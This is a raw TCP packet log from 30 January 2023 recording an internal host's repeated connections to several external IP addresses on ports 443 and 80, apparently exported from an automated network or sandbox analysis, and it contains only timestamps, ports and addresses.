                                                    Jan 30, 2023 13:39:22.447782040 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447875023 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.447895050 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447993040 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.449795961 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.449877977 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.449944019 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.449966908 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.449990034 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.450017929 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451205015 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451385021 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451467037 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451592922 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451627970 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451627970 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451647997 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451673031 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451710939 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451745987 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451814890 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452194929 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452303886 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452696085 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452773094 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452788115 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452796936 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452828884 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452856064 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452857018 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452876091 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452958107 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452965975 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.453017950 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.453022957 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.453058958 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.453119040 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.453167915 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.454703093 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.454730988 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:57.546324968 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.582758904 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:39:57.586954117 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.586954117 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.623389959 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:39:57.623446941 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:39:57.623467922 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:39:57.623763084 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.624233961 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.660485029 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:40:19.792903900 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:20.001596928 CET8049721164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:20.001739979 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:20.001878023 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:20.210808992 CET8049721164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:20.210977077 CET8049721164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:20.211021900 CET8049721164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:20.211127996 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:21.513009071 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:22.527595997 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:22.737683058 CET8049722164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:22.737827063 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:22.738095045 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:22.946904898 CET8049722164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:22.946933031 CET8049722164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:22.946950912 CET8049722164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:22.947011948 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:24.245372057 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.262624025 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.484009027 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:25.484124899 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.484545946 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.706729889 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:25.706928015 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:25.706950903 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:25.707140923 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.707547903 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.928698063 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:30.764200926 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:30.967143059 CET804972518.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:30.970335007 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:30.970472097 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:31.172807932 CET804972518.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:31.172877073 CET804972518.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:31.172954082 CET804972518.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:31.173029900 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:32.480093002 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:33.496948957 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:33.695856094 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.696396112 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:33.696614027 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:33.895018101 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.895057917 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.895081043 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.895095110 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.895309925 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:35.202296972 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.215483904 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.425582886 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:36.425718069 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.425826073 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.635426044 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:36.635482073 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:36.635502100 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:36.635760069 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.636168003 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.845787048 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:41.676239014 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:41.844973087 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:41.845174074 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:41.845371008 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:42.013531923 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128724098 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128768921 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128793955 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128820896 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128827095 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:42.128868103 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:42.128945112 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128967047 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.129005909 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:43.402419090 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.404827118 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.577898026 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.578073978 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.578386068 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.749290943 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.749335051 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859843016 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859882116 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859901905 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859924078 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859965086 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.860017061 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.862633944 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.862781048 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:46.090738058 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.106947899 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.278270006 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.278618097 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.278994083 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.450901985 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556508064 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556543112 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556564093 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556608915 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556624889 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556642056 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556866884 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.556984901 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.557430983 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.728897095 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:52.700012922 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:52.992713928 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:52.992897987 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:52.993088961 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.286868095 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.424937963 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.424966097 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.424988031 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.425043106 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.432383060 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.432414055 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.432516098 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.435611963 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.435642958 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.435726881 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.446582079 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.446629047 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.446661949 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.446739912 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.446784973 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.716959000 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.717006922 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.717175961 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:54.503427982 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:55.529690027 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:55.823306084 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:55.823544025 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:55.823978901 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.114732027 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.280698061 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.280740976 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.280770063 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.280824900 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.287031889 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.287069082 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.287189007 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.290450096 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.290494919 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.290525913 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.300537109 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.300573111 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.300595999 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.300652981 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.301518917 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.570230961 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.570288897 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.570405960 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:57.326096058 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:58.342499971 CET4973480192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:58.640877962 CET8049734103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:58.641129017 CET4973480192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:58.641371012 CET4973480192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:58.939575911 CET8049734103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:59.116734982 CET8049734103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:59.116771936 CET8049734103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:59.117033958 CET4973480192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:59.117249966 CET4973480192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:59.415405035 CET8049734103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:41:04.161086082 CET4973580192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:04.180124044 CET804973576.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:04.180318117 CET4973580192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:04.180514097 CET4973580192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:04.199661970 CET804973576.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:04.209849119 CET804973576.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:04.209882021 CET804973576.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:04.215035915 CET4973580192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:04.221956015 CET804973576.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:04.239168882 CET4973580192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:05.692241907 CET4973580192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:06.697329998 CET4973680192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:06.716121912 CET804973676.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:06.716274023 CET4973680192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:06.716495991 CET4973680192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:06.736165047 CET804973676.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:06.736207962 CET804973676.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:06.740963936 CET804973676.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:06.741027117 CET804973676.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:06.741250038 CET4973680192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:06.753870964 CET804973676.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:06.754139900 CET4973680192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:08.257805109 CET4973680192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:09.280435085 CET4973780192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:09.299359083 CET804973776.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:09.299545050 CET4973780192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:09.299675941 CET4973780192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:09.318811893 CET804973776.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:09.326175928 CET804973776.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:09.326225996 CET804973776.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:09.326452971 CET4973780192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:09.326656103 CET4973780192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:09.339257956 CET804973776.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:09.342561007 CET4973780192.168.2.676.223.105.230
                                                    Jan 30, 2023 13:41:09.345684052 CET804973776.223.105.230192.168.2.6
                                                    Jan 30, 2023 13:41:14.590357065 CET4973880192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:14.610666990 CET804973881.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:14.610924959 CET4973880192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:14.645462036 CET4973880192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:14.665632963 CET804973881.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:14.669533014 CET804973881.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:14.669583082 CET804973881.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:14.669738054 CET4973880192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:16.235805988 CET4973880192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:17.237525940 CET4974080192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:17.257216930 CET804974081.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:17.257441044 CET4974080192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:17.257637024 CET4974080192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:17.277112961 CET804974081.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:17.278341055 CET804974081.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:17.278378963 CET804974081.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:17.278546095 CET4974080192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:18.768625975 CET4974080192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:19.784842968 CET4974180192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:19.804399014 CET804974181.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:19.804579020 CET4974180192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:19.804721117 CET4974180192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:19.824100971 CET804974181.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:19.825449944 CET804974181.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:19.825515032 CET804974181.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:19.825639963 CET4974180192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:19.825787067 CET4974180192.168.2.681.169.145.72
                                                    Jan 30, 2023 13:41:19.845159054 CET804974181.169.145.72192.168.2.6
                                                    Jan 30, 2023 13:41:25.518810987 CET4974280192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:25.719950914 CET8049742163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:25.720271111 CET4974280192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:25.720735073 CET4974280192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:25.921480894 CET8049742163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:25.923171043 CET8049742163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:25.923213005 CET8049742163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:25.923307896 CET4974280192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:27.222496986 CET4974280192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:28.239480972 CET4974380192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:28.445998907 CET8049743163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:28.446202993 CET4974380192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:28.446418047 CET4974380192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:28.651483059 CET8049743163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:28.651550055 CET8049743163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:28.653239965 CET8049743163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:28.653273106 CET8049743163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:28.653431892 CET4974380192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:29.957156897 CET4974380192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:30.974261045 CET4974480192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:31.182272911 CET8049744163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:31.184710979 CET4974480192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:31.198645115 CET4974480192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:31.406486034 CET8049744163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:31.408519030 CET8049744163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:31.408549070 CET8049744163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:31.408773899 CET4974480192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:31.414251089 CET4974480192.168.2.6163.44.198.50
                                                    Jan 30, 2023 13:41:31.622173071 CET8049744163.44.198.50192.168.2.6
                                                    Jan 30, 2023 13:41:36.584933043 CET4974580192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:36.733287096 CET8049745208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:36.735279083 CET4974580192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:36.735569954 CET4974580192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:36.883918047 CET8049745208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:39.255127907 CET4974680192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:39.401117086 CET8049746208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:39.401274920 CET4974680192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:39.401545048 CET4974680192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:39.547468901 CET8049746208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:41.927066088 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:42.073277950 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:42.073383093 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:42.073522091 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:42.219332933 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.019862890 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.019927025 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.019973993 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.020020962 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.020066977 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.020093918 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:43.020093918 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:43.020118952 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.020168066 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.020215034 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.020226002 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:43.020263910 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:43.020267963 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.020315886 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.020363092 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.020472050 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:43.034863949 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.034972906 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:43.166290998 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.166363001 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.166445017 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.166491032 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.166538954 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.166580915 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:43.168076992 CET4974780192.168.2.6208.91.197.27
                                                    Jan 30, 2023 13:41:43.168284893 CET4974780192.168.2.6208.91.197.27
